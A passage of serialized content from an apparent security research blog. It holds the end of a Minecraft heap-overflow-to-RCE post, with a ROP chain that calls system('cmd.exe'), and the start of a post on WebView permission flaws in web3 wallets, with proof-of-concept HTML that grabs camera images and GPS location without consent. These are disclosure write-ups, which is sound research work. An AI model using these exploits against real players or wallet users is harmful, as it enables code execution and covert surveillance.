",{"type":25,"tag":82,"props":159973,"children":159975},{"className":159974},[],[159976],{"type":31,"value":159977},"ucrtbase.dll",{"type":31,"value":159979}," (which exports ",{"type":25,"tag":82,"props":159981,"children":159983},{"className":159982},[],[159984],{"type":31,"value":135684},{"type":31,"value":159986},"). It then calls ",{"type":25,"tag":82,"props":159988,"children":159990},{"className":159989},[],[159991],{"type":31,"value":159992},"GetProcAddress(ucrtbase_addr, \"system\")",{"type":31,"value":159994}," to retrieve the function’s address. Finally, it invokes ",{"type":25,"tag":82,"props":159996,"children":159998},{"className":159997},[],[159999],{"type":31,"value":135684},{"type":31,"value":160001}," with the \"cmd.exe\" string.",{"type":25,"tag":38,"props":160003,"children":160004},{},[160005],{"type":31,"value":160006},"In the exploit script, the ROP chain looks something like this:",{"type":25,"tag":206,"props":160008,"children":160010},{"code":160009,"language":23420,"meta":7,"className":23421,"style":7},"# get the address of `GetModuleHandle` to `rax`\nrop.gadget(pop_r8)\nrop.gadget(addr_get_module_handle_a - 0x28)\n# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\nrop.gadget(mov_rax_r8_28)\n\n# call `GetModuleHandle(\"ucrtbase.dll\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468B68) # offset of \"ucrtbase.dll\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `GetModuleHandle`\nrop.literal(u64(b\"ucrtbase\"))\nrop.literal(u64(b\".dll\\x00\\x00\\x00\\x00\"))\nrop.literal(u64(b\"system\\x00\\x00\"))\n\n# call `GetProcAddress(ucrtbase_base, \"system\")`\nrop.gadget(xchg_rcx_rax) # move the return value of `GetModuleHandle` to rcx\nrop.gadget(pop_rdx)\nrop.gadget(0x7468B68 + 0x10) # offset of \"system\" string\nrop.gadget(get_proc_addr)\n\n# call `system(\"cmd.exe\")`\nrop.gadget(pop_rcx)\nrop.gadget(0x7468DB8) # offset of \"cmd.exe\" string\nrop.gadget(ret) # movaps alignment\nrop.gadget(push_rax_ret) # calls `system`\nrop.literal(u64(b\"cmd.exe\\x00\"))\n",[160011],{"type":25,"tag":82,"props":160012,"children":160013},{"__ignoreMap":7},[160014,160022,160030,160055,160063,160071,160078,160086,160094,160121,160134,160147,160168,160197,160226,160233,160241,160254,160262,160298,160306,160313,160321,160328,160353,160364,160376],{"type":25,"tag":216,"props":160015,"children":160016},{"class":6922,"line":6923},[160017],{"type":25,"tag":216,"props":160018,"children":160019},{"style":6927},[160020],{"type":31,"value":160021},"# get the address of `GetModuleHandle` to `rax`\n",{"type":25,"tag":216,"props":160023,"children":160024},{"class":6922,"line":6769},[160025],{"type":25,"tag":216,"props":160026,"children":160027},{"style":6964},[160028],{"type":31,"value":160029},"rop.gadget(pop_r8)\n",{"type":25,"tag":216,"props":160031,"children":160032},{"class":6922,"line":6778},[160033,160038,160042,160047,160051],{"type":25,"tag":216,"props":160034,"children":160035},{"style":6964},[160036],{"type":31,"value":160037},"rop.gadget(addr_get_module_handle_a ",{"type":25,"tag":216,"props":160039,"children":160040},{"style":6953},[160041],{"type":31,"value":8276},{"type":25,"tag":216,"props":160043,"children":160044},{"style":6936},[160045],{"type":31,"value":160046}," 0x",{"type":25,"tag":216,"props":160048,"children":160049},{"style":6989},[160050],{"type":31,"value":138800},{"type":25,"tag":216,"props":160052,"children":160053},{"style":6964},[160054],{"type":31,"value":7107},{"type":25,"tag":216,"props":160056,"children":160057},{"class":6922,"line":7005},[160058],{"type":25,"tag":216,"props":160059,"children":160060},{"style":6927},[160061],{"type":31,"value":160062},"# 0x0000000145dcd83d : mov rax, qword ptr [r8 + 0x28] ; ret\n",{"type":25,"tag":216,"props":160064,"children":160065},{"class":6922,"line":7110},[160066],{"type":25,"tag":216,"props":160067,"children":160068},{"style":6964},[160069],{"type":31,"value":160070},"rop.gadget(mov_rax_r8_28)\n",{"type":25,"tag":216,"props":160072,"children":160073},{"class":6922,"line":7216},[160074],{"type":25,"tag":216,"props":160075,"children":160076},{"emptyLinePlaceholder":16},[160077],{"type":31,"value":7642},{"type":25,"tag":216,"props":160079,"children":160080},{"class":6922,"line":7244},[160081],{"type":25,"tag":216,"props":160082,"children":160083},{"style":6927},[160084],{"type":31,"value":160085},"# call `GetModuleHandle(\"ucrtbase.dll\")`\n",{"type":25,"tag":216,"props":160087,"children":160088},{"class":6922,"line":7257},[160089],{"type":25,"tag":216,"props":160090,"children":160091},{"style":6964},[160092],{"type":31,"value":160093},"rop.gadget(pop_rcx)\n",{"type":25,"tag":216,"props":160095,"children":160096},{"class":6922,"line":7275},[160097,160102,160107,160112,160116],{"type":25,"tag":216,"props":160098,"children":160099},{"style":6964},[160100],{"type":31,"value":160101},"rop.gadget(",{"type":25,"tag":216,"props":160103,"children":160104},{"style":6936},[160105],{"type":31,"value":160106},"0x",{"type":25,"tag":216,"props":160108,"children":160109},{"style":6989},[160110],{"type":31,"value":160111},"7468B68",{"type":25,"tag":216,"props":160113,"children":160114},{"style":6964},[160115],{"type":31,"value":7036},{"type":25,"tag":216,"props":160117,"children":160118},{"style":6927},[160119],{"type":31,"value":160120},"# offset of \"ucrtbase.dll\" string\n",{"type":25,"tag":216,"props":160122,"children":160123},{"class":6922,"line":7296},[160124,160129],{"type":25,"tag":216,"props":160125,"children":160126},{"style":6964},[160127],{"type":31,"value":160128},"rop.gadget(ret) ",{"type":25,"tag":216,"props":160130,"children":160131},{"style":6927},[160132],{"type":31,"value":160133},"# movaps alignment\n",{"type":25,"tag":216,"props":160135,"children":160136},{"class":6922,"line":7305},[160137,160142],{"type":25,"tag":216,"props":160138,"children":160139},{"style":6964},[160140],{"type":31,"value":160141},"rop.gadget(push_rax_ret) ",{"type":25,"tag":216,"props":160143,"children":160144},{"style":6927},[160145],{"type":31,"value":160146},"# calls `GetModuleHandle`\n",{"type":25,"tag":216,"props":160148,"children":160149},{"class":6922,"line":7557},[160150,160155,160159,160164],{"type":25,"tag":216,"props":160151,"children":160152},{"style":6964},[160153],{"type":31,"value":160154},"rop.literal(u64(",{"type":25,"tag":216,"props":160156,"children":160157},{"style":6936},[160158],{"type":31,"value":7171},{"type":25,"tag":216,"props":160160,"children":160161},{"style":8205},[160162],{"type":31,"value":160163},"\"ucrtbase\"",{"type":25,"tag":216,"props":160165,"children":160166},{"style":6964},[160167],{"type":31,"value":23672},{"type":25,"tag":216,"props":160169,"children":160170},{"class":6922,"line":7574},[160171,160175,160179,160184,160189,160193],{"type":25,"tag":216,"props":160172,"children":160173},{"style":6964},[160174],{"type":31,"value":160154},{"type":25,"tag":216,"props":160176,"children":160177},{"style":6936},[160178],{"type":31,"value":7171},{"type":25,"tag":216,"props":160180,"children":160181},{"style":8205},[160182],{"type":31,"value":160183},"\".dll",{"type":25,"tag":216,"props":160185,"children":160186},{"style":52342},[160187],{"type":31,"value":160188},"\\x00\\x00\\x00\\x00",{"type":25,"tag":216,"props":160190,"children":160191},{"style":8205},[160192],{"type":31,"value":24020},{"type":25,"tag":216,"props":160194,"children":160195},{"style":6964},[160196],{"type":31,"value":23672},{"type":25,"tag":216,"props":160198,"children":160199},{"class":6922,"line":7591},[160200,160204,160208,160213,160218,160222],{"type":25,"tag":216,"props":160201,"children":160202},{"style":6964},[160203],{"type":31,"value":160154},{"type":25,"tag":216,"props":160205,"children":160206},{"style":6936},[160207],{"type":31,"value":7171},{"type":25,"tag":216,"props":160209,"children":160210},{"style":8205},[160211],{"type":31,"value":160212},"\"system",{"type":25,"tag":216,"props":160214,"children":160215},{"style":52342},[160216],{"type":31,"value":160217},"\\x00\\x00",{"type":25,"tag":216,"props":160219,"children":160220},{"style":8205},[160221],{"type":31,"value":24020},{"type":25,"tag":216,"props":160223,"children":160224},{"style":6964},[160225],{"type":31,"value":23672},{"type":25,"tag":216,"props":160227,"children":160228},{"class":6922,"line":7604},[160229],{"type":25,"tag":216,"props":160230,"children":160231},{"emptyLinePlaceholder":16},[160232],{"type":31,"value":7642},{"type":25,"tag":216,"props":160234,"children":160235},{"class":6922,"line":7613},[160236],{"type":25,"tag":216,"props":160237,"children":160238},{"style":6927},[160239],{"type":31,"value":160240},"# call `GetProcAddress(ucrtbase_base, \"system\")`\n",{"type":25,"tag":216,"props":160242,"children":160243},{"class":6922,"line":7636},[160244,160249],{"type":25,"tag":216,"props":160245,"children":160246},{"style":6964},[160247],{"type":31,"value":160248},"rop.gadget(xchg_rcx_rax) ",{"type":25,"tag":216,"props":160250,"children":160251},{"style":6927},[160252],{"type":31,"value":160253},"# move the return value of `GetModuleHandle` to rcx\n",{"type":25,"tag":216,"props":160255,"children":160256},{"class":6922,"line":7645},[160257],{"type":25,"tag":216,"props":160258,"children":160259},{"style":6964},[160260],{"type":31,"value":160261},"rop.gadget(pop_rdx)\n",{"type":25,"tag":216,"props":160263,"children":160264},{"class":6922,"line":7654},[160265,160269,160273,160277,160281,160285,160289,160293],{"type":25,"tag":216,"props":160266,"children":160267},{"style":6964},[160268],{"type":31,"value":160101},{"type":25,"tag":216,"props":160270,"children":160271},{"style":6936},[160272],{"type":31,"value":160106},{"type":25,"tag":216,"props":160274,"children":160275},{"style":6989},[160276],{"type":31,"value":160111},{"type":25,"tag":216,"props":160278,"children":160279},{"style":6953},[160280],{"type":31,"value":12858},{"type":25,"tag":216,"props":160282,"children":160283},{"style":6936},[160284],{"type":31,"value":160046},{"type":25,"tag":216,"props":160286,"children":160287},{"style":6989},[160288],{"type":31,"value":93224},{"type":25,"tag":216,"props":160290,"children":160291},{"style":6964},[160292],{"type":31,"value":7036},{"type":25,"tag":216,"props":160294,"children":160295},{"style":6927},[160296],{"type":31,"value":160297},"# offset of \"system\" string\n",{"type":25,"tag":216,"props":160299,"children":160300},{"class":6922,"line":7722},[160301],{"type":25,"tag":216,"props":160302,"children":160303},{"style":6964},[160304],{"type":31,"value":160305},"rop.gadget(get_proc_addr)\n",{"type":25,"tag":216,"props":160307,"children":160308},{"class":6922,"line":7730},[160309],{"type":25,"tag":216,"props":160310,"children":160311},{"emptyLinePlaceholder":16},[160312],{"type":31,"value":7642},{"type":25,"tag":216,"props":160314,"children":160315},{"class":6922,"line":7760},[160316],{"type":25,"tag":216,"props":160317,"children":160318},{"style":6927},[160319],{"type":31,"value":160320},"# call `system(\"cmd.exe\")`\n",{"type":25,"tag":216,"props":160322,"children":160323},{"class":6922,"line":7768},[160324],{"type":25,"tag":216,"props":160325,"children":160326},{"style":6964},[160327],{"type":31,"value":160093},{"type":25,"tag":216,"props":160329,"children":160330},{"class":6922,"line":7800},[160331,160335,160339,160344,160348],{"type":25,"tag":216,"props":160332,"children":160333},{"style":6964},[160334],{"type":31,"value":160101},{"type":25,"tag":216,"props":160336,"children":160337},{"style":6936},[160338],{"type":31,"value":160106},{"type":25,"tag":216,"props":160340,"children":160341},{"style":6989},[160342],{"type":31,"value":160343},"7468DB8",{"type":25,"tag":216,"props":160345,"children":160346},{"style":6964},[160347],{"type":31,"value":7036},{"type":25,"tag":216,"props":160349,"children":160350},{"style":6927},[160351],{"type":31,"value":160352},"# offset of \"cmd.exe\" string\n",{"type":25,"tag":216,"props":160354,"children":160355},{"class":6922,"line":7808},[160356,160360],{"type":25,"tag":216,"props":160357,"children":160358},{"style":6964},[160359],{"type":31,"value":160128},{"type":25,"tag":216,"props":160361,"children":160362},{"style":6927},[160363],{"type":31,"value":160133},{"type":25,"tag":216,"props":160365,"children":160366},{"class":6922,"line":7868},[160367,160371],{"type":25,"tag":216,"props":160368,"children":160369},{"style":6964},[160370],{"type":31,"value":160141},{"type":25,"tag":216,"props":160372,"children":160373},{"style":6927},[160374],{"type":31,"value":160375},"# calls `system`\n",{"type":25,"tag":216,"props":160377,"children":160378},{"class":6922,"line":13001},[160379,160383,160387,160392,160397,160401],{"type":25,"tag":216,"props":160380,"children":160381},{"style":6964},[160382],{"type":31,"value":160154},{"type":25,"tag":216,"props":160384,"children":160385},{"style":6936},[160386],{"type":31,"value":7171},{"type":25,"tag":216,"props":160388,"children":160389},{"style":8205},[160390],{"type":31,"value":160391},"\"cmd.exe",{"type":25,"tag":216,"props":160393,"children":160394},{"style":52342},[160395],{"type":31,"value":160396},"\\x00",{"type":25,"tag":216,"props":160398,"children":160399},{"style":8205},[160400],{"type":31,"value":24020},{"type":25,"tag":216,"props":160402,"children":160403},{"style":6964},[160404],{"type":31,"value":23672},{"type":25,"tag":606,"props":160406,"children":160408},{"id":160407},"demo",[160409],{"type":31,"value":160410},"Demo",{"type":25,"tag":38,"props":160412,"children":160413},{},[160414],{"type":31,"value":160415},"The demo video below shows a Molang script achieving arbitrary read and write primitives to execute the previous ROP chain:",{"type":25,"tag":135790,"props":160417,"children":160420},{"className":160418,"controls":16},[145756,160419],"blog-video-wide",[160421,160422,160426],{"type":31,"value":145759},{"type":25,"tag":144995,"props":160423,"children":160425},{"src":160424,"type":135788},"/posts/minecraft-heap-overflow-to-rce/demo.mp4",[],{"type":31,"value":145765},{"type":25,"tag":26,"props":160428,"children":160429},{"id":32892},[160430],{"type":31,"value":22907},{"type":25,"tag":38,"props":160432,"children":160433},{},[160434],{"type":31,"value":160435},"This blog post is quite long, which reflects how modern mitigations make remote exploitation highly cumbersome - but still not impossible.",{"type":25,"tag":38,"props":160437,"children":160438},{},[160439],{"type":31,"value":160440},"It also demonstrates an interesting technique of abusing Molang to achieve RCE without relying on client information leaks.",{"type":25,"tag":38,"props":160442,"children":160443},{},[160444],{"type":31,"value":160445},"Finally, it highlights an underexplored area in security: video games. Even massively popular games like Minecraft contain large, complex, and unexplored attack surfaces.",{"type":25,"tag":9316,"props":160447,"children":160448},{},[160449],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":160451},[160452,160456,160461,160472],{"id":151112,"depth":6769,"text":151115,"children":160453},[160454,160455],{"id":151147,"depth":6778,"text":151150},{"id":151163,"depth":6778,"text":151166},{"id":151184,"depth":6769,"text":151187,"children":160457},[160458,160459,160460],{"id":151200,"depth":6778,"text":151203},{"id":151288,"depth":6778,"text":151291},{"id":153588,"depth":6778,"text":153591},{"id":9370,"depth":6769,"text":9373,"children":160462},[160463,160464,160465,160466,160467,160468,160469,160470,160471],{"id":153695,"depth":6778,"text":153698},{"id":153720,"depth":6778,"text":153723},{"id":153857,"depth":6778,"text":153860},{"id":156021,"depth":6778,"text":156024},{"id":156383,"depth":6778,"text":156386},{"id":157203,"depth":6778,"text":157206},{"id":159317,"depth":6778,"text":159320},{"id":159935,"depth":6778,"text":159938},{"id":160407,"depth":6778,"text":160410},{"id":32892,"depth":6769,"text":22907},"content:blog:2026-06-02-minecraft-heap-overflow-to-rce.md","blog/2026-06-02-minecraft-heap-overflow-to-rce.md","blog/2026-06-02-minecraft-heap-overflow-to-rce",{"_path":160477,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":160478,"description":160479,"date":160480,"author":160481,"image":160483,"isFeatured":16,"onBlogPage":16,"tags":160485,"body":160487,"_type":6798,"_id":162810,"_source":6800,"_file":162811,"_stem":162812,"_extension":6803},"/blog/2026-06-18-goldmine-of-insecure-webview-integrations","The Goldmine of Insecure WebView Integrations","WebViews in mobile web3 wallets can quietly inherit the permissions granted to the wallet app itself. We found 20+ major wallets where a malicious dApp could access core permissions without authorization.","2026-06-18T12:00:00.000Z",[35163,35162,160482],"nikolaos",{"src":160484,"width":101226,"height":17580},"/posts/insecure-webview-integrations/title.png",[36103,135896,160486],"webview",{"type":22,"children":160488,"toc":162797},[160489,160494,160499,160505,160510,160515,160520,160526,160531,160537,160559,160572,160592,160606,160612,160626,160634,160639,160645,160650,160659,160680,160824,160829,160835,160840,160845,160859,160863,160868,160886,162314,162318,162323,162335,162344,162349,162355,162377,162385,162390,162396,162401,162419,162424,162430,162443,162725,162753,162766,162771,162784,162788,162793],{"type":25,"tag":38,"props":160490,"children":160491},{},[160492],{"type":31,"value":160493},"WebViews are everywhere in mobile web3 wallets, but they are often treated as just a convenient way to load dApps. In reality, they can quietly inherit powerful app capabilities that attackers can exploit.",{"type":25,"tag":38,"props":160495,"children":160496},{},[160497],{"type":31,"value":160498},"In this article, we look at several WebView issues we found across wallet apps and libraries, including some issues in React Native.",{"type":25,"tag":453,"props":160500,"children":160502},{"id":160501},"exploiting-mobile-webviews",[160503],{"type":31,"value":160504},"Exploiting Mobile WebViews",{"type":25,"tag":38,"props":160506,"children":160507},{},[160508],{"type":31,"value":160509},"A well known feature of most web3 wallets is the ability to interact with decentralized applications, often referred to as dApps.",{"type":25,"tag":38,"props":160511,"children":160512},{},[160513],{"type":31,"value":160514},"For a wallet application to be compatible with various dApps, it must support a message exchange system between the dApp webpage and the underlying wallet. On both Android and iOS, this is often achieved by loading the webpage inside a WebView component.",{"type":25,"tag":38,"props":160516,"children":160517},{},[160518],{"type":31,"value":160519},"Since dApps are such a widely supported feature, our main research goal was to uncover lesser known vulnerabilities affecting most - if not all - WebView implementations. One issue we repeatedly encountered is related to how React Native WebView handles permission requests. In order to understand these vulnerabilities and how they can be exploited, we first need to dig into how iOS and Android WebViews actually work.",{"type":25,"tag":26,"props":160521,"children":160523},{"id":160522},"handling-webview-permissions",[160524],{"type":31,"value":160525},"Handling WebView permissions",{"type":25,"tag":38,"props":160527,"children":160528},{},[160529],{"type":31,"value":160530},"In this section, we'll get into the inner workings of permission requests and how they are handled on Android compared to iOS.",{"type":25,"tag":606,"props":160532,"children":160534},{"id":160533},"android",[160535],{"type":31,"value":160536},"Android",{"type":25,"tag":38,"props":160538,"children":160539},{},[160540,160542,160549,160551,160557],{"type":31,"value":160541},"If we take a look at the Android documentation, the method responsible for granting or denying permission requests is ",{"type":25,"tag":162,"props":160543,"children":160546},{"href":160544,"rel":160545},"https://developer.android.com/reference/android/webkit/WebChromeClient#onPermissionRequest(android.webkit.PermissionRequest)",[166],[160547],{"type":31,"value":160548},"onPermissionRequest",{"type":31,"value":160550},". When a new permission request is triggered by a webpage, this method is called with a ",{"type":25,"tag":82,"props":160552,"children":160554},{"className":160553},[],[160555],{"type":31,"value":160556},"PermissionRequest",{"type":31,"value":160558}," object where the WebView developers must decide whether to grant or deny it.",{"type":25,"tag":34,"props":160560,"children":160561},{},[160562],{"type":25,"tag":38,"props":160563,"children":160564},{},[160565,160567,160570],{"type":31,"value":160566},"Notify the host application that web content is requesting permission to access the specified resources and the permission currently isn't granted or denied. The host application must invoke PermissionRequest.grant(String",{"type":25,"tag":216,"props":160568,"children":160569},{},[],{"type":31,"value":160571},") or PermissionRequest.deny(). If this method isn't overridden, the permission is denied.",{"type":25,"tag":38,"props":160573,"children":160574},{},[160575,160577,160583,160585,160591],{"type":31,"value":160576},"This object contains all the necessary information to evaluate the request, such as the webpage origin with ",{"type":25,"tag":82,"props":160578,"children":160580},{"className":160579},[],[160581],{"type":31,"value":160582},"getOrigin()",{"type":31,"value":160584}," and the requested permissions with ",{"type":25,"tag":82,"props":160586,"children":160588},{"className":160587},[],[160589],{"type":31,"value":160590},"getResources()",{"type":31,"value":179},{"type":25,"tag":38,"props":160593,"children":160594},{},[160595,160597,160604],{"type":31,"value":160596},"If we read the previous Android documentation carefully, we will see that any permission requests are denied by default. For this reason, most WebView wrappers opt to enable permission granting by overwriting this method, such as the official ",{"type":25,"tag":162,"props":160598,"children":160601},{"href":160599,"rel":160600},"https://chromium.googlesource.com/chromium/src/+/HEAD/android_webview/tools/system_webview_shell/apk/src/org/chromium/webview_shell/WebViewBrowserFragment.java#644",[166],[160602],{"type":31,"value":160603},"webview_shell",{"type":31,"value":160605},". In this instance, no origin checks are performed.",{"type":25,"tag":606,"props":160607,"children":160609},{"id":160608},"ios",[160610],{"type":31,"value":160611},"iOS",{"type":25,"tag":38,"props":160613,"children":160614},{},[160615,160617,160624],{"type":31,"value":160616},"On the contrary, iOS ",{"type":25,"tag":162,"props":160618,"children":160621},{"href":160619,"rel":160620},"https://developer.apple.com/documentation/webkit/wkuidelegate/webview(_:requestmediacapturepermissionfor:initiatedbyframe:type:decisionhandler:)?language=objc",[166],[160622],{"type":31,"value":160623},"documentation",{"type":31,"value":160625}," states that:",{"type":25,"tag":34,"props":160627,"children":160628},{},[160629],{"type":25,"tag":38,"props":160630,"children":160631},{},[160632],{"type":31,"value":160633},"If you don’t implement this method in your delegate, the system returns WKPermissionDecisionPrompt.",{"type":25,"tag":38,"props":160635,"children":160636},{},[160637],{"type":31,"value":160638},"This effectively means that by default, iOS determines whether a webpage (bound by its security origin) can access any permission using a prompt message. In this way, origin isolation for permission requests on iOS apps is enforced by default.",{"type":25,"tag":26,"props":160640,"children":160642},{"id":160641},"the-shortcomings-of-webview-implementations",[160643],{"type":31,"value":160644},"The shortcomings of WebView implementations",{"type":25,"tag":38,"props":160646,"children":160647},{},[160648],{"type":31,"value":160649},"Most web3 mobile wallets have an in-app feature that allows users to scan QR codes for a more user-friendly transaction experience. However, to use this feature, the user must grant the app permission to access the camera. Since this is a powerful permission, a pop-up will appear.",{"type":25,"tag":35308,"props":160651,"children":160652},{"style":35310},[160653],{"type":25,"tag":6467,"props":160654,"children":160658},{"src":160655,"alt":160656,"style":160657},"/posts/insecure-webview-integrations/image1.png","Camera permission prompt","max-height:360px; width:auto; max-width:100%;",[],{"type":25,"tag":38,"props":160660,"children":160661},{},[160662,160664,160670,160672,160678],{"type":31,"value":160663},"Since most wallets are based on React Native, the most commonly used WebView implementation is ",{"type":25,"tag":82,"props":160665,"children":160667},{"className":160666},[],[160668],{"type":31,"value":160669},"react-native-webview",{"type":31,"value":160671},". If we take a look at how they handle a request that reaches the ",{"type":25,"tag":162,"props":160673,"children":160676},{"href":160674,"rel":160675},"https://github.com/react-native-webview/react-native-webview/blob/eb8ccacd35740af39993725ad1b592d45364a510/android/src/main/java/com/reactnativecommunity/webview/RNCWebChromeClient.java#L146",[166],[160677],{"type":31,"value":160548},{"type":31,"value":160679}," method, we see a similar pattern.",{"type":25,"tag":206,"props":160681,"children":160685},{"className":160682,"code":160683,"language":160684,"meta":7,"style":7},"language-java shiki shiki-themes slack-dark","// If all the permissions are already granted, send the response to the WebView synchronously\nif (requestedAndroidPermissions.isEmpty()) {\n    request.grant(grantedPermissions.toArray(new String[0]));\n    grantedPermissions = null;\n    return;\n}\n","java",[160686],{"type":25,"tag":82,"props":160687,"children":160688},{"__ignoreMap":7},[160689,160697,160726,160786,160806,160817],{"type":25,"tag":216,"props":160690,"children":160691},{"class":6922,"line":6923},[160692],{"type":25,"tag":216,"props":160693,"children":160694},{"style":6927},[160695],{"type":31,"value":160696},"// If all the permissions are already granted, send the response to the WebView synchronously\n",{"type":25,"tag":216,"props":160698,"children":160699},{"class":6922,"line":6769},[160700,160704,160708,160713,160717,160722],{"type":25,"tag":216,"props":160701,"children":160702},{"style":6973},[160703],{"type":31,"value":19537},{"type":25,"tag":216,"props":160705,"children":160706},{"style":6964},[160707],{"type":31,"value":7016},{"type":25,"tag":216,"props":160709,"children":160710},{"style":6947},[160711],{"type":31,"value":160712},"requestedAndroidPermissions",{"type":25,"tag":216,"props":160714,"children":160715},{"style":6964},[160716],{"type":31,"value":179},{"type":25,"tag":216,"props":160718,"children":160719},{"style":7047},[160720],{"type":31,"value":160721},"isEmpty",{"type":25,"tag":216,"props":160723,"children":160724},{"style":6964},[160725],{"type":31,"value":95992},{"type":25,"tag":216,"props":160727,"children":160728},{"class":6922,"line":6778},[160729,160734,160738,160743,160747,160752,160756,160761,160765,160769,160774,160778,160782],{"type":25,"tag":216,"props":160730,"children":160731},{"style":6947},[160732],{"type":31,"value":160733},"    request",{"type":25,"tag":216,"props":160735,"children":160736},{"style":6964},[160737],{"type":31,"value":179},{"type":25,"tag":216,"props":160739,"children":160740},{"style":7047},[160741],{"type":31,"value":160742},"grant",{"type":25,"tag":216,"props":160744,"children":160745},{"style":6964},[160746],{"type":31,"value":1850},{"type":25,"tag":216,"props":160748,"children":160749},{"style":6947},[160750],{"type":31,"value":160751},"grantedPermissions",{"type":25,"tag":216,"props":160753,"children":160754},{"style":6964},[160755],{"type":31,"value":179},{"type":25,"tag":216,"props":160757,"children":160758},{"style":7047},[160759],{"type":31,"value":160760},"toArray",{"type":25,"tag":216,"props":160762,"children":160763},{"style":6964},[160764],{"type":31,"value":1850},{"type":25,"tag":216,"props":160766,"children":160767},{"style":6973},[160768],{"type":31,"value":19080},{"type":25,"tag":216,"props":160770,"children":160771},{"style":7375},[160772],{"type":31,"value":160773}," String",{"type":25,"tag":216,"props":160775,"children":160776},{"style":6964},[160777],{"type":31,"value":7701},{"type":25,"tag":216,"props":160779,"children":160780},{"style":6989},[160781],{"type":31,"value":1882},{"type":25,"tag":216,"props":160783,"children":160784},{"style":6964},[160785],{"type":31,"value":107470},{"type":25,"tag":216,"props":160787,"children":160788},{"class":6922,"line":7005},[160789,160794,160798,160802],{"type":25,"tag":216,"props":160790,"children":160791},{"style":6964},[160792],{"type":31,"value":160793},"    grantedPermissions ",{"type":25,"tag":216,"props":160795,"children":160796},{"style":6953},[160797],{"type":31,"value":266},{"type":25,"tag":216,"props":160799,"children":160800},{"style":6936},[160801],{"type":31,"value":74239},{"type":25,"tag":216,"props":160803,"children":160804},{"style":6964},[160805],{"type":31,"value":6967},{"type":25,"tag":216,"props":160807,"children":160808},{"class":6922,"line":7110},[160809,160813],{"type":25,"tag":216,"props":160810,"children":160811},{"style":6973},[160812],{"type":31,"value":20947},{"type":25,"tag":216,"props":160814,"children":160815},{"style":6964},[160816],{"type":31,"value":6967},{"type":25,"tag":216,"props":160818,"children":160819},{"class":6922,"line":7216},[160820],{"type":25,"tag":216,"props":160821,"children":160822},{"style":6964},[160823],{"type":31,"value":7874},{"type":25,"tag":38,"props":160825,"children":160826},{},[160827],{"type":31,"value":160828},"As we can see above, if the Android app has already been granted access to the requested permissions, this method simply allows the loaded WebView to use them. This follows the same pattern as Google's WebView Shell implementation - no origin checks being performed. When this behavior is now combined with the typical web3 wallet features, namely dApps, a serious oversight arises.",{"type":25,"tag":606,"props":160830,"children":160832},{"id":160831},"real-world-exploitation",[160833],{"type":31,"value":160834},"Real world exploitation",{"type":25,"tag":38,"props":160836,"children":160837},{},[160838],{"type":31,"value":160839},"As mentioned, web3 mobile apps often use a WebView to load and execute dApps, with the most common implementation being React Native WebView. Developers assume that these WebViews, and especially React Native WebView, provide origin isolation by default for sensitive permissions. However, they do not. This allows any malicious dApp to request and use any permission already granted to the underlying application. No additional user consent checks are performed.",{"type":25,"tag":38,"props":160841,"children":160842},{},[160843],{"type":31,"value":160844},"If the app doesn’t already have these permissions, once the user allows camera or GPS access for a specific dApp inside the wallet, every other dApp can access those permissions without user consent, since there is no origin isolation.",{"type":25,"tag":38,"props":160846,"children":160847},{},[160848,160850,160857],{"type":31,"value":160849},"During our audits and research, we discovered more than 20 major wallets vulnerable to this attack scenario. While most were using React Native WebView, other less frequently used libraries were suffering from the same bug. One such example is the ",{"type":25,"tag":162,"props":160851,"children":160854},{"href":160852,"rel":160853},"https://github.com/Justson/AgentWeb/blob/95d48cd5a03227aa15644c4ef3a65c820b067616/agentweb-core/src/main/java/com/just/agentweb/DefaultChromeClient.java#L250",[166],[160855],{"type":31,"value":160856},"Justson",{"type":31,"value":160858},", used by a popular wallet in the Stellar ecosystem.",{"type":25,"tag":630,"props":160860,"children":160861},{"id":43468},[160862],{"type":31,"value":38792},{"type":25,"tag":38,"props":160864,"children":160865},{},[160866],{"type":31,"value":160867},"In order to exploit this issue, we assume the following preconditions:",{"type":25,"tag":6711,"props":160869,"children":160870},{},[160871,160876,160881],{"type":25,"tag":2043,"props":160872,"children":160873},{},[160874],{"type":31,"value":160875},"The user has already granted the camera permission just to the wallet application or to another dApp with a different origin.",{"type":25,"tag":2043,"props":160877,"children":160878},{},[160879],{"type":31,"value":160880},"The user is tricked into visiting a malicious dApp or redirected to one from the web.",{"type":25,"tag":2043,"props":160882,"children":160883},{},[160884],{"type":31,"value":160885},"Once the dApp loads, the following code will run, allowing the attacker to take a picture with the camera.",{"type":25,"tag":206,"props":160887,"children":160889},{"className":53990,"code":160888,"language":36345,"meta":7,"style":7},"\u003C!DOCTYPE html>\n\u003Chtml>\n\u003Chead>\n    \u003Cmeta charset=\"utf-8\">\n    \u003Ctitle>\u003C/title>\n\u003C/head>\n\u003Cbody>\n    \u003Ch2>Smile dApp :)\u003C/h2>\n    \u003Cbutton id=\"connect\">Connect your wallet!\u003C/button>\n    \u003Cpre id=\"gps\">\u003C/pre>\n    \u003Cimg id=\"pic\">\n    \u003Cscript>\n        window.addEventListener('unhandledrejection', function (event) {\n            alert(`Unhandled Promise Rejection: ${event.reason}`);\n        });\n        window.onerror = function (msg, url, line, col, error) {\n            alert('onerror: ' + msg);\n            return false;\n        };\n\n        async function main() {\n            const stream = await navigator.mediaDevices.getUserMedia({ video: true });\n            const video = document.createElement(\"video\");\n            video.srcObject = stream;\n            const canvas = document.createElement(\"canvas\");\n\n            video.onloadedmetadata = () => {\n                canvas.width = video.videoWidth;\n                canvas.height = video.videoHeight;\n            };\n\n            connect.onclick = e => {\n                video.play();\n\n                canvas.getContext(\"2d\").drawImage(video, 0, 0);\n                stream.getTracks().forEach(t => t.stop());\n                canvas.toBlob((blob) => {\n                    pic.src = URL.createObjectURL(blob);\n                });\n\n                navigator.geolocation.getCurrentPosition(pos => {\n                    const c = pos.coords;\n                    gps.innerText = `Lat: ${c.latitude.toFixed(1)}\\nLon: ${c.longitude.toFixed(1)}`;\n                }, err => alert(err));\n            };\n\n        }\n        main();\n    